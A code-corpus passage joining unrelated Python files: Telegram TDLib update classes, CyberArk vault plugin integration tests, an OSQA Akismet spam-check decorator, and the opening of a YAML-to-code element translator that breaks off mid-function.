:type interaction_info: :class:`MessageInteractionInfo`, optional
"""
ID: str = Field("updateMessageInteractionInfo", alias="@type")
chat_id: int
message_id: int
interaction_info: typing.Optional[MessageInteractionInfo] = None
@staticmethod
def read(q: dict) -> UpdateMessageInteractionInfo:
return UpdateMessageInteractionInfo.construct(**q)
class UpdateMessageIsPinned(Update):
"""
The message pinned state was changed
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: The message identifier
:type message_id: :class:`int`
:param is_pinned: True, if the message is pinned
:type is_pinned: :class:`bool`
"""
ID: str = Field("updateMessageIsPinned", alias="@type")
chat_id: int
message_id: int
is_pinned: bool
@staticmethod
def read(q: dict) -> UpdateMessageIsPinned:
return UpdateMessageIsPinned.construct(**q)
class UpdateMessageLiveLocationViewed(Update):
"""
A message with a live location was viewed. When the update is received, the application is supposed to update the live location
:param chat_id: Identifier of the chat with the live location message
:type chat_id: :class:`int`
:param message_id: Identifier of the message with live location
:type message_id: :class:`int`
"""
ID: str = Field("updateMessageLiveLocationViewed", alias="@type")
chat_id: int
message_id: int
@staticmethod
def read(q: dict) -> UpdateMessageLiveLocationViewed:
return UpdateMessageLiveLocationViewed.construct(**q)
class UpdateMessageMentionRead(Update):
"""
A message with an unread mention was read
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param message_id: Message identifier
:type message_id: :class:`int`
:param unread_mention_count: The new number of unread mention messages left in the chat
:type unread_mention_count: :class:`int`
"""
ID: str = Field("updateMessageMentionRead", alias="@type")
chat_id: int
message_id: int
unread_mention_count: int
@staticmethod
def read(q: dict) -> UpdateMessageMentionRead:
return UpdateMessageMentionRead.construct(**q)
class UpdateMessageSendAcknowledged(Update):
"""
A request to send a message has reached the Telegram server. This doesn't mean that the message will be sent successfully or even that the send message request will be processed. This update will be sent only if the option "use_quick_ack" is set to true. This update may be sent multiple times for the same message
:param chat_id: The chat identifier of the sent message
:type chat_id: :class:`int`
:param message_id: A temporary message identifier
:type message_id: :class:`int`
"""
ID: str = Field("updateMessageSendAcknowledged", alias="@type")
chat_id: int
message_id: int
@staticmethod
def read(q: dict) -> UpdateMessageSendAcknowledged:
return UpdateMessageSendAcknowledged.construct(**q)
class UpdateMessageSendFailed(Update):
"""
A message failed to send. Be aware that some messages being sent can be irrecoverably deleted, in which case updateDeleteMessages will be received instead of this update
:param message: The failed to send message
:type message: :class:`Message`
:param old_message_id: The previous temporary message identifier
:type old_message_id: :class:`int`
:param error_code: An error code
:type error_code: :class:`int`
:param error_message: Error message
:type error_message: :class:`str`
"""
ID: str = Field("updateMessageSendFailed", alias="@type")
message: Message
old_message_id: int
error_code: int
error_message: str
@staticmethod
def read(q: dict) -> UpdateMessageSendFailed:
return UpdateMessageSendFailed.construct(**q)
class UpdateMessageSendSucceeded(Update):
"""
A message has been successfully sent
:param message: The sent message. Usually only the message identifier, date, and content are changed, but almost all other fields can also change
:type message: :class:`Message`
:param old_message_id: The previous temporary message identifier
:type old_message_id: :class:`int`
"""
ID: str = Field("updateMessageSendSucceeded", alias="@type")
message: Message
old_message_id: int
@staticmethod
def read(q: dict) -> UpdateMessageSendSucceeded:
return UpdateMessageSendSucceeded.construct(**q)
class UpdateNewCallSignalingData(Update):
"""
New call signaling data arrived
:param call_id: The call identifier
:type call_id: :class:`int`
:param data: The data
:type data: :class:`str`
"""
ID: str = Field("updateNewCallSignalingData", alias="@type")
call_id: int
data: str
@staticmethod
def read(q: dict) -> UpdateNewCallSignalingData:
return UpdateNewCallSignalingData.construct(**q)
class UpdateNewCallbackQuery(Update):
"""
A new incoming callback query; for bots only
:param id: Unique query identifier
:type id: :class:`int`
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param chat_id: Identifier of the chat where the query was sent
:type chat_id: :class:`int`
:param message_id: Identifier of the message, from which the query originated
:type message_id: :class:`int`
:param chat_instance: Identifier that uniquely corresponds to the chat to which the message was sent
:type chat_instance: :class:`int`
:param payload: Query payload
:type payload: :class:`CallbackQueryPayload`
"""
ID: str = Field("updateNewCallbackQuery", alias="@type")
id: int
sender_user_id: int
chat_id: int
message_id: int
chat_instance: int
payload: CallbackQueryPayload
@staticmethod
def read(q: dict) -> UpdateNewCallbackQuery:
return UpdateNewCallbackQuery.construct(**q)
class UpdateNewChat(Update):
"""
A new chat has been loaded/created. This update is guaranteed to come before the chat identifier is returned to the application. The chat field changes will be reported through separate updates
:param chat: The chat
:type chat: :class:`Chat`
"""
ID: str = Field("updateNewChat", alias="@type")
chat: Chat
@staticmethod
def read(q: dict) -> UpdateNewChat:
return UpdateNewChat.construct(**q)
class UpdateNewChatJoinRequest(Update):
"""
A user sent a join request to a chat; for bots only
:param chat_id: Chat identifier
:type chat_id: :class:`int`
:param request: Join request
:type request: :class:`ChatJoinRequest`
:param invite_link: The invite link, which was used to send join request; may be null, defaults to None
:type invite_link: :class:`ChatInviteLink`, optional
"""
ID: str = Field("updateNewChatJoinRequest", alias="@type")
chat_id: int
request: ChatJoinRequest
invite_link: typing.Optional[ChatInviteLink] = None
@staticmethod
def read(q: dict) -> UpdateNewChatJoinRequest:
return UpdateNewChatJoinRequest.construct(**q)
class UpdateNewChosenInlineResult(Update):
"""
The user has chosen a result of an inline query; for bots only
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param user_location: User location; may be null, defaults to None
:type user_location: :class:`Location`, optional
:param query: Text of the query
:type query: :class:`str`
:param result_id: Identifier of the chosen result
:type result_id: :class:`str`
:param inline_message_id: Identifier of the sent inline message, if known
:type inline_message_id: :class:`str`
"""
ID: str = Field("updateNewChosenInlineResult", alias="@type")
sender_user_id: int
user_location: typing.Optional[Location] = None
query: str
result_id: str
inline_message_id: str
@staticmethod
def read(q: dict) -> UpdateNewChosenInlineResult:
return UpdateNewChosenInlineResult.construct(**q)
class UpdateNewCustomEvent(Update):
"""
A new incoming event; for bots only
:param event: A JSON-serialized event
:type event: :class:`str`
"""
ID: str = Field("updateNewCustomEvent", alias="@type")
event: str
@staticmethod
def read(q: dict) -> UpdateNewCustomEvent:
return UpdateNewCustomEvent.construct(**q)
class UpdateNewCustomQuery(Update):
"""
A new incoming query; for bots only
:param id: The query identifier
:type id: :class:`int`
:param data: JSON-serialized query data
:type data: :class:`str`
:param timeout: Query timeout
:type timeout: :class:`int`
"""
ID: str = Field("updateNewCustomQuery", alias="@type")
id: int
data: str
timeout: int
@staticmethod
def read(q: dict) -> UpdateNewCustomQuery:
return UpdateNewCustomQuery.construct(**q)
class UpdateNewInlineCallbackQuery(Update):
"""
A new incoming callback query from a message sent via a bot; for bots only
:param id: Unique query identifier
:type id: :class:`int`
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param inline_message_id: Identifier of the inline message, from which the query originated
:type inline_message_id: :class:`str`
:param chat_instance: An identifier uniquely corresponding to the chat a message was sent to
:type chat_instance: :class:`int`
:param payload: Query payload
:type payload: :class:`CallbackQueryPayload`
"""
ID: str = Field("updateNewInlineCallbackQuery", alias="@type")
id: int
sender_user_id: int
inline_message_id: str
chat_instance: int
payload: CallbackQueryPayload
@staticmethod
def read(q: dict) -> UpdateNewInlineCallbackQuery:
return UpdateNewInlineCallbackQuery.construct(**q)
class UpdateNewInlineQuery(Update):
"""
A new incoming inline query; for bots only
:param id: Unique query identifier
:type id: :class:`int`
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param user_location: User location; may be null, defaults to None
:type user_location: :class:`Location`, optional
:param chat_type: The type of the chat, from which the query originated; may be null if unknown, defaults to None
:type chat_type: :class:`ChatType`, optional
:param query: Text of the query
:type query: :class:`str`
:param offset: Offset of the first entry to return
:type offset: :class:`str`
"""
ID: str = Field("updateNewInlineQuery", alias="@type")
id: int
sender_user_id: int
user_location: typing.Optional[Location] = None
chat_type: typing.Optional[ChatType] = None
query: str
offset: str
@staticmethod
def read(q: dict) -> UpdateNewInlineQuery:
return UpdateNewInlineQuery.construct(**q)
class UpdateNewMessage(Update):
"""
A new message was received; can also be an outgoing message
:param message: The new message
:type message: :class:`Message`
"""
ID: str = Field("updateNewMessage", alias="@type")
message: Message
@staticmethod
def read(q: dict) -> UpdateNewMessage:
return UpdateNewMessage.construct(**q)
class UpdateNewPreCheckoutQuery(Update):
"""
A new incoming pre-checkout query; for bots only. Contains full information about a checkout
:param id: Unique query identifier
:type id: :class:`int`
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param currency: Currency for the product price
:type currency: :class:`str`
:param total_amount: Total price for the product, in the smallest units of the currency
:type total_amount: :class:`int`
:param invoice_payload: Invoice payload
:type invoice_payload: :class:`str`
:param shipping_option_id: Identifier of a shipping option chosen by the user; may be empty if not applicable
:type shipping_option_id: :class:`str`
:param order_info: Information about the order; may be null, defaults to None
:type order_info: :class:`OrderInfo`, optional
"""
ID: str = Field("updateNewPreCheckoutQuery", alias="@type")
id: int
sender_user_id: int
currency: str
total_amount: int
invoice_payload: str
shipping_option_id: str
order_info: typing.Optional[OrderInfo] = None
@staticmethod
def read(q: dict) -> UpdateNewPreCheckoutQuery:
return UpdateNewPreCheckoutQuery.construct(**q)
class UpdateNewShippingQuery(Update):
"""
A new incoming shipping query; for bots only. Only for invoices with flexible price
:param id: Unique query identifier
:type id: :class:`int`
:param sender_user_id: Identifier of the user who sent the query
:type sender_user_id: :class:`int`
:param invoice_payload: Invoice payload
:type invoice_payload: :class:`str`
:param shipping_address: User shipping address
:type shipping_address: :class:`Address`
"""
ID: str = Field("updateNewShippingQuery", alias="@type")
id: int
sender_user_id: int
invoice_payload: str
shipping_address: Address
@staticmethod
def read(q: dict) -> UpdateNewShippingQuery:
return UpdateNewShippingQuery.construct(**q)
class UpdateNotification(Update):
"""
A notification was changed
:param notification_group_id: Unique notification group identifier
:type notification_group_id: :class:`int`
:param notification: Changed notification
:type notification: :class:`Notification`
"""
ID: str = Field("updateNotification", alias="@type")
notification_group_id: int
notification: Notification
@staticmethod
def read(q: dict) -> UpdateNotification:
return UpdateNotification.construct(**q)
class UpdateNotificationGroup(Update):
"""
A list of active notifications in a notification group has changed
:param notification_group_id: Unique notification group identifier
:type notification_group_id: :class:`int`
:param type_: New type of the notification group
:type type_: :class:`NotificationGroupType`
:param chat_id: Identifier of a chat to which all notifications in the group belong
:type chat_id: :class:`int`
:param notification_settings_chat_id: Chat identifier, which notification settings must be applied to the added notifications
:type notification_settings_chat_id: :class:`int`
:param is_silent: True, if the notifications must be shown without sound
:type is_silent: :class:`bool`
:param total_count: Total number of unread notifications in the group, can be bigger than number of active notifications
:type total_count: :class:`int`
:param added_notifications: List of added group notifications, sorted by notification ID
:type added_notifications: :class:`list[Notification]`
:param removed_notification_ids: Identifiers of removed group notifications, sorted by notification ID
:type removed_notification_ids: :class:`list[int]`
"""
ID: str = Field("updateNotificationGroup", alias="@type")
notification_group_id: int
type_: NotificationGroupType = Field(..., alias='type')
chat_id: int
notification_settings_chat_id: int
is_silent: bool
total_count: int
added_notifications: list[Notification]
removed_notification_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateNotificationGroup:
return UpdateNotificationGroup.construct(**q)
class UpdateOption(Update):
"""
An option changed its value
:param name: The option name
:type name: :class:`str`
:param value: The new option value
:type value: :class:`OptionValue`
"""
ID: str = Field("updateOption", alias="@type")
name: str
value: OptionValue
@staticmethod
def read(q: dict) -> UpdateOption:
return UpdateOption.construct(**q)
class UpdatePoll(Update):
"""
A poll was updated; for bots only
:param poll: New data about the poll
:type poll: :class:`Poll`
"""
ID: str = Field("updatePoll", alias="@type")
poll: Poll
@staticmethod
def read(q: dict) -> UpdatePoll:
return UpdatePoll.construct(**q)
class UpdatePollAnswer(Update):
"""
A user changed the answer to a poll; for bots only
:param poll_id: Unique poll identifier
:type poll_id: :class:`int`
:param user_id: The user, who changed the answer to the poll
:type user_id: :class:`int`
:param option_ids: 0-based identifiers of answer options, chosen by the user
:type option_ids: :class:`list[int]`
"""
ID: str = Field("updatePollAnswer", alias="@type")
poll_id: int
user_id: int
option_ids: list[int]
@staticmethod
def read(q: dict) -> UpdatePollAnswer:
return UpdatePollAnswer.construct(**q)
class UpdateRecentStickers(Update):
"""
The list of recently used stickers was updated
:param is_attached: True, if the list of stickers attached to photo or video files was updated, otherwise the list of sent stickers is updated
:type is_attached: :class:`bool`
:param sticker_ids: The new list of file identifiers of recently used stickers
:type sticker_ids: :class:`list[int]`
"""
ID: str = Field("updateRecentStickers", alias="@type")
is_attached: bool
sticker_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateRecentStickers:
return UpdateRecentStickers.construct(**q)
class UpdateSavedAnimations(Update):
"""
The list of saved animations was updated
:param animation_ids: The new list of file identifiers of saved animations
:type animation_ids: :class:`list[int]`
"""
ID: str = Field("updateSavedAnimations", alias="@type")
animation_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateSavedAnimations:
return UpdateSavedAnimations.construct(**q)
class UpdateScopeNotificationSettings(Update):
"""
Notification settings for some type of chats were updated
:param scope: Types of chats for which notification settings were updated
:type scope: :class:`NotificationSettingsScope`
:param notification_settings: The new notification settings
:type notification_settings: :class:`ScopeNotificationSettings`
"""
ID: str = Field("updateScopeNotificationSettings", alias="@type")
scope: NotificationSettingsScope
notification_settings: ScopeNotificationSettings
@staticmethod
def read(q: dict) -> UpdateScopeNotificationSettings:
return UpdateScopeNotificationSettings.construct(**q)
class UpdateSecretChat(Update):
"""
Some data of a secret chat has changed. This update is guaranteed to come before the secret chat identifier is returned to the application
:param secret_chat: New data about the secret chat
:type secret_chat: :class:`SecretChat`
"""
ID: str = Field("updateSecretChat", alias="@type")
secret_chat: SecretChat
@staticmethod
def read(q: dict) -> UpdateSecretChat:
return UpdateSecretChat.construct(**q)
class UpdateSelectedBackground(Update):
"""
The selected background has changed
:param for_dark_theme: True, if background for dark theme has changed
:type for_dark_theme: :class:`bool`
:param background: The new selected background; may be null, defaults to None
:type background: :class:`Background`, optional
"""
ID: str = Field("updateSelectedBackground", alias="@type")
for_dark_theme: bool
background: typing.Optional[Background] = None
@staticmethod
def read(q: dict) -> UpdateSelectedBackground:
return UpdateSelectedBackground.construct(**q)
class UpdateServiceNotification(Update):
"""
A service notification from the server was received. Upon receiving this the application must show a popup with the content of the notification
:param type_: Notification type. If type begins with "AUTH_KEY_DROP_", then two buttons "Cancel" and "Log out" must be shown under notification; if user presses the second, all local data must be destroyed using Destroy method
:type type_: :class:`str`
:param content: Notification content
:type content: :class:`MessageContent`
"""
ID: str = Field("updateServiceNotification", alias="@type")
type_: str = Field(..., alias='type')
content: MessageContent
@staticmethod
def read(q: dict) -> UpdateServiceNotification:
return UpdateServiceNotification.construct(**q)
class UpdateStickerSet(Update):
"""
A sticker set has changed
:param sticker_set: The sticker set
:type sticker_set: :class:`StickerSet`
"""
ID: str = Field("updateStickerSet", alias="@type")
sticker_set: StickerSet
@staticmethod
def read(q: dict) -> UpdateStickerSet:
return UpdateStickerSet.construct(**q)
class UpdateSuggestedActions(Update):
"""
The list of suggested to the user actions has changed
:param added_actions: Added suggested actions
:type added_actions: :class:`list[SuggestedAction]`
:param removed_actions: Removed suggested actions
:type removed_actions: :class:`list[SuggestedAction]`
"""
ID: str = Field("updateSuggestedActions", alias="@type")
added_actions: list[SuggestedAction]
removed_actions: list[SuggestedAction]
@staticmethod
def read(q: dict) -> UpdateSuggestedActions:
return UpdateSuggestedActions.construct(**q)
class UpdateSupergroup(Update):
"""
Some data of a supergroup or a channel has changed. This update is guaranteed to come before the supergroup identifier is returned to the application
:param supergroup: New data about the supergroup
:type supergroup: :class:`Supergroup`
"""
ID: str = Field("updateSupergroup", alias="@type")
supergroup: Supergroup
@staticmethod
def read(q: dict) -> UpdateSupergroup:
return UpdateSupergroup.construct(**q)
class UpdateSupergroupFullInfo(Update):
"""
Some data in supergroupFullInfo has been changed
:param supergroup_id: Identifier of the supergroup or channel
:type supergroup_id: :class:`int`
:param supergroup_full_info: New full information about the supergroup
:type supergroup_full_info: :class:`SupergroupFullInfo`
"""
ID: str = Field("updateSupergroupFullInfo", alias="@type")
supergroup_id: int
supergroup_full_info: SupergroupFullInfo
@staticmethod
def read(q: dict) -> UpdateSupergroupFullInfo:
return UpdateSupergroupFullInfo.construct(**q)
class UpdateTermsOfService(Update):
"""
New terms of service must be accepted by the user. If the terms of service are declined, then the deleteAccount method must be called with the reason "Decline ToS update"
:param terms_of_service_id: Identifier of the terms of service
:type terms_of_service_id: :class:`str`
:param terms_of_service: The new terms of service
:type terms_of_service: :class:`TermsOfService`
"""
ID: str = Field("updateTermsOfService", alias="@type")
terms_of_service_id: str
terms_of_service: TermsOfService
@staticmethod
def read(q: dict) -> UpdateTermsOfService:
return UpdateTermsOfService.construct(**q)
class UpdateTrendingStickerSets(Update):
"""
The list of trending sticker sets was updated or some of them were viewed
:param sticker_sets: The prefix of the list of trending sticker sets with the newest trending sticker sets
:type sticker_sets: :class:`StickerSets`
"""
ID: str = Field("updateTrendingStickerSets", alias="@type")
sticker_sets: StickerSets
@staticmethod
def read(q: dict) -> UpdateTrendingStickerSets:
return UpdateTrendingStickerSets.construct(**q)
class UpdateUnreadChatCount(Update):
"""
Number of unread chats, i.e. with unread messages or marked as unread, has changed. This update is sent only if the message database is used
:param chat_list: The chat list with changed number of unread messages
:type chat_list: :class:`ChatList`
:param total_count: Approximate total number of chats in the chat list
:type total_count: :class:`int`
:param unread_count: Total number of unread chats
:type unread_count: :class:`int`
:param unread_unmuted_count: Total number of unread unmuted chats
:type unread_unmuted_count: :class:`int`
:param marked_as_unread_count: Total number of chats marked as unread
:type marked_as_unread_count: :class:`int`
:param marked_as_unread_unmuted_count: Total number of unmuted chats marked as unread
:type marked_as_unread_unmuted_count: :class:`int`
"""
ID: str = Field("updateUnreadChatCount", alias="@type")
chat_list: ChatList
total_count: int
unread_count: int
unread_unmuted_count: int
marked_as_unread_count: int
marked_as_unread_unmuted_count: int
@staticmethod
def read(q: dict) -> UpdateUnreadChatCount:
return UpdateUnreadChatCount.construct(**q)
class UpdateUnreadMessageCount(Update):
"""
Number of unread messages in a chat list has changed. This update is sent only if the message database is used
:param chat_list: The chat list with changed number of unread messages
:type chat_list: :class:`ChatList`
:param unread_count: Total number of unread messages
:type unread_count: :class:`int`
:param unread_unmuted_count: Total number of unread messages in unmuted chats
:type unread_unmuted_count: :class:`int`
"""
ID: str = Field("updateUnreadMessageCount", alias="@type")
chat_list: ChatList
unread_count: int
unread_unmuted_count: int
@staticmethod
def read(q: dict) -> UpdateUnreadMessageCount:
return UpdateUnreadMessageCount.construct(**q)
class UpdateUser(Update):
"""
Some data of a user has changed. This update is guaranteed to come before the user identifier is returned to the application
:param user: New data about the user
:type user: :class:`User`
"""
ID: str = Field("updateUser", alias="@type")
user: User
@staticmethod
def read(q: dict) -> UpdateUser:
return UpdateUser.construct(**q)
class UpdateUserFullInfo(Update):
"""
Some data in userFullInfo has been changed
:param user_id: User identifier
:type user_id: :class:`int`
:param user_full_info: New full information about the user
:type user_full_info: :class:`UserFullInfo`
"""
ID: str = Field("updateUserFullInfo", alias="@type")
user_id: int
user_full_info: UserFullInfo
@staticmethod
def read(q: dict) -> UpdateUserFullInfo:
return UpdateUserFullInfo.construct(**q)
class UpdateUserPrivacySettingRules(Update):
"""
Some privacy setting rules have been changed
:param setting: The privacy setting
:type setting: :class:`UserPrivacySetting`
:param rules: New privacy rules
:type rules: :class:`UserPrivacySettingRules`
"""
ID: str = Field("updateUserPrivacySettingRules", alias="@type")
setting: UserPrivacySetting
rules: UserPrivacySettingRules
@staticmethod
def read(q: dict) -> UpdateUserPrivacySettingRules:
return UpdateUserPrivacySettingRules.construct(**q)
class UpdateUserStatus(Update):
"""
The user went online or offline
:param user_id: User identifier
:type user_id: :class:`int`
:param status: New status of the user
:type status: :class:`UserStatus`
"""
ID: str = Field("updateUserStatus", alias="@type")
user_id: int
status: UserStatus
@staticmethod
def read(q: dict) -> UpdateUserStatus:
return UpdateUserStatus.construct(**q)
class UpdateUsersNearby(Update):
"""
The list of users nearby has changed. The update is guaranteed to be sent only 60 seconds after a successful searchChatsNearby request
:param users_nearby: The new list of users nearby
:type users_nearby: :class:`list[ChatNearby]`
"""
ID: str = Field("updateUsersNearby", alias="@type")
users_nearby: list[ChatNearby]
@staticmethod
def read(q: dict) -> UpdateUsersNearby:
return UpdateUsersNearby.construct(**q)
| 1.351563 | 1 |
lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 0 | 17678 | <reponame>OneIdentity/safeguard-sessions-plugin-cyberark-vault
#
# Copyright (c) 2019 One Identity
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import pytest
from textwrap import dedent
from ..plugin import Plugin
from safeguard.sessions.plugin_impl.test_utils.plugin import assert_plugin_hook_result
def test_cyberark_integration_getting_password(cy_config, cy_account, cy_asset, cy_account_password, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [cy_account_password]})
def test_cyberark_integration_getting_password_for_wrong_user(cy_config, cy_wrong_account, cy_asset, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_wrong_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": []})
def test_cyberark_integration_getting_private_key(cy_config, cy_account_with_key, cy_asset, cy_account_private_key, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_private_key_list(
**connection_parameters(server_uname=cy_account_with_key, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"private_keys": [("ssh-rsa", cy_account_private_key)]})
def test_cyberark_integration_getting_private_key_for_wrong_account(cy_config, cy_wrong_account, cy_asset, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_private_key_list(
**connection_parameters(server_uname=cy_wrong_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"private_keys": []})
def test_v10_user_logon(cy_config, cy_account, cy_asset, cy_account_password, connection_parameters):
config = cy_config + "\nauthentication_method=cyberark"
plugin = Plugin(config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [cy_account_password]})
@pytest.mark.skip(reason="I don't know how this was tested before, cannot see settings on our CArk")
def test_v10_ldap_logon(
cy_address,
cy_ldap_username,
cy_ldap_password,
cy_account,
cy_asset,
cy_account_password,
connection_parameters
):
config = dedent(
"""
[cyberark]
address={}
use_credential=explicit
username={}
password={}
authentication_method=ldap
""".format(
cy_address, cy_ldap_username, cy_ldap_password
)
)
plugin = Plugin(config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [<PASSWORD>]})
| 1.554688 | 2 |
forum_modules/akismet/startup.py | Stackato-Apps/osqa | 1 | 17679 | import json
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.utils.encoding import smart_str
from django.shortcuts import render_to_response
from forum.modules import decorate
from forum import views
from lib.akismet import Akismet
from forum.settings import APP_URL, OSQA_VERSION
from settings import WORDPRESS_API_KEY, REP_FOR_NO_SPAM_CHECK
from forum.models.user import User
from forum.forms.general import SimpleCaptchaForm
import settings
def can_bypass_spam_check(user):
return user.is_authenticated and (user.is_superuser or user.is_staff or cmp(int(user.reputation), REP_FOR_NO_SPAM_CHECK) > 0)
def check_spam(param, comment_type):
def wrapper(origin, request, *args, **kwargs):
if request.POST and request.POST.get(param, None) and WORDPRESS_API_KEY and (not can_bypass_spam_check(request.user)):
comment = smart_str(request.POST[param])
data = {
"user_ip":request.META["REMOTE_ADDR"],
"user_agent":request.environ['HTTP_USER_AGENT'],
"comment_type": comment_type,
"comment":comment
}
if request.user.is_authenticated():
data.update({
"comment_author":smart_str(request.user.username),
"comment_author_email":request.user.email,
"comment_author_url":request.user.website,
})
api = Akismet(settings.WORDPRESS_API_KEY, APP_URL, "OSQA/%s" % OSQA_VERSION)
if api.comment_check(comment, data):
post_data = request.POST
captcha_form = SimpleCaptchaForm(request.POST)
if request.is_ajax():
response = {
'success': False,
'error_message': _("Sorry, but akismet thinks your %s is spam.") % comment_type
}
return HttpResponse(json.dumps(response), mimetype="application/json")
else:
captcha_checked = False
try:
if captcha_form.is_valid() and 'recaptcha' in captcha_form.fields.keys():
captcha_checked = True
except:
pass
if not captcha_checked:
return render_to_response('modules/akismet/foundspam.html', {
'action_name': comment_type,
'post_data' : post_data,
'captcha_form' : captcha_form,
}, RequestContext(request))
return origin(request, *args, **kwargs)
return wrapper
decorate(views.writers.ask)(check_spam('text', _('question')))
decorate(views.writers.answer)(check_spam('text', _('answer')))
decorate(views.commands.comment)(check_spam('comment', _('comment')))
| 2.015625 | 2 |
prototype/python/element_translator.py | doanminhdang/YAML_MATH | 1 | 17680 | """
Translate an element, which is described by the YAML method file
and a descriptor file, into a target function.
Procedure:
1. When analyzing a YAML file, parse the call to the method-element, to get:
- list of inputs,
- list of outputs
2. Parse the YAML of that element, to know the name of the inputs and outputs,
create inputs and outputs with such names, value are translated-names (string,
given by the name-allocator before translating methods), they will be accessed
in the descriptor of that element.
3. Process the descriptor:
- If preprocess part is available: execute the preprocess part as Python 3 code.
- Treat the code part as text (a string), parse that text to detect:
anywhere there is the structure <var_name>, then replace it with the value
of that variable currently in Python memory (within scope of processing that
specific descriptor). The new text after processing the code part is named code.
- If postprocess part is available: execute the postprocess part as Python 3
code. By requirement, at the end of postprocess part, there will be a variables
named `code`. Write the value of `code` into the output string.
"""
import re
from . import descriptor_parser
from . import utils
from .shared_parameters import *
# def descriptor_file_parse(descriptor_file, method_file):
# descriptor = descriptor_file_read(descriptor_file)
# yaml_method = yaml_method_file_read(method_file)
# preprocess_parse(descriptor_file)
def yaml_single_method_file_read(yaml_method_file):
"""
Read a method file which contains only one block
"""
yaml_block = utils.yaml_file_read(yaml_method_file)
# Analyze its commands
return
def translate_command_element(odict_command, element_file, descriptor_file):
descriptor = descriptor_parser.descriptor_file_read(descriptor_file)
preprocess_string = descriptor['preprocess']
code_string = descriptor['code']
postprocess_string = descriptor['postprocess']
yaml_element = utils.yaml_file_read(element_file)
list_command_keys = [key for key in odict_command.keys()]
first_key = list_command_keys[0]
input_names = odict_command[first_key]
output_name = utils.get_var_name_from_bank(1)
list_element_keys = [key for key in yaml_element.keys()]
element_name = list_element_keys[0]
element_inputs = yaml_element[element_name]['inputs']
element_output = yaml_element[element_name]['outputs']
if not element_name.startswith(first_key): # overloading: add__float for add
raise ValueError('Element does not match command.')
else:
real_inputs = analyze_inputs(input_names, element_inputs)
real_output = analyze_outputs(output_name, element_output)
translated_code = translate_single_code(real_inputs, real_output,\
preprocess_string, code_string, postprocess_string)
return translated_code
def analyze_inputs(input_names, element_inputs):
"""
Get decoded names from the input_names (list) and the template
element_inputs (odict).
The output is a dict, with keys from element_inputs and values are picked
with corresponding order from input_names.
If element_inputs contains both 'name' and 'array_name', then array_name
must be the last item. This function automatically assign the rest of the
input names into an array, if 'array_name' is found in element_inputs.
"""
real_inputs = {}
index_input_names = 0
for item in element_inputs:
# item == OrderedDict([('array_name', 'input_'), ('length', ''), ('type', 'float')])
if 'name' in item:
real_inputs.update({item['name']: input_names[index_input_names]})
index_input_names += 1
elif 'array_name' in item:
names_left = input_names[index_input_names:]
array_length = len(names_left)
real_inputs.update({item['array_name']: names_left})
# for k in range(array_length):
# real_inputs.update({item['array_name'] + '[' + str(k) + ']': names_left[k]})
return real_inputs
def analyze_outputs(output_name, element_output):
output_var = element_output[0]['name']
output_dict = {output_var: output_name[0]}
return output_dict
def parse_code(code_string):
"""
Parse the multi-line string which contains the code, pick variable in <>.
Output: list of segments, each is a dict with key `text` or `var`,
and value is the text or the variable name.
"""
code = []
var_pattern = r'\<[\w\[\]]+\>'
rolling_code = code_string
while re.search(var_pattern, rolling_code):
start_index = re.search(var_pattern, rolling_code).start()
var_group = re.search(var_pattern, rolling_code).group()
var_name = var_group.strip('<>')
if start_index > 0:
text_before = rolling_code[0:start_index]
code.append({'text': text_before})
code.append({'var': var_name})
rolling_code = rolling_code[start_index+len(var_group):]
return code
def translate_single_code(input_dict, output_dict, preprocess_string,\
code_string, postprocess_string):
"""
input_dict == {'input_': ['A_1', 'A_2', 'A_3']}
output_dict == {'output': 'Alpha'}
parsed_code == [{'var': 'output'}, {'text': ' := '}, {'var': 'command_text'}]
"""
_code_series = parse_code(code_string)
print('preprocess:')
print(preprocess_string)
print('code:')
print(code_string)
print('postprocess:')
print(postprocess_string)
for _key in input_dict:
if isinstance(input_dict[_key], list):
# it is an array
_assign_code = _key + '=' + '['
for _item in input_dict[_key]:
_assign_code += '\'' + _item + '\','
